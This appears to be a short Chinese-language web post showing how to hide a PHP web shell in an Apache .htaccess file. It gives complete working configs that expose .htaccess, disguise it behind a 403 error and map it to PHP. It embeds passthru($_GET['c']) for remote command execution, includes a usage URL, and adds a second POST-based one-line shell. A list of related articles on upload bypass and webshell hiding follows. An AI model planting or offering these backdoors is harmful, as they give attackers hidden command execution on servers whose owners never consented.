用.htaccess做更隐蔽的后门

.htaccess内容如下

#首先允许web访问这个文件

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

RedirectMatch 403 .htaccess$
#.htaccess结尾的403错误,这里是为了增加隐蔽性

AddType application/x-httpd-php .htaccess
#给.htaccess映射php拓展

### SHELL ### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>### KINDLE ###
#恶意的php代码

使用方法:http://localhost/.htaccess/?c=dir

例子:

<Files ~ "^\.ht">
    Order allow,deny
    allow from all
</Files>

AddType application/x-httpd-php .htaccess

#<?php $_POST['id']($_POST['image']);?> 

相关内容:

php上传绕过及缺陷经验解说

IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结

浅析php后门木马 - 技术文章

JPEG MetaData and .Htaccess For Webshell Hiden

利用 .htaccess 来执行马儿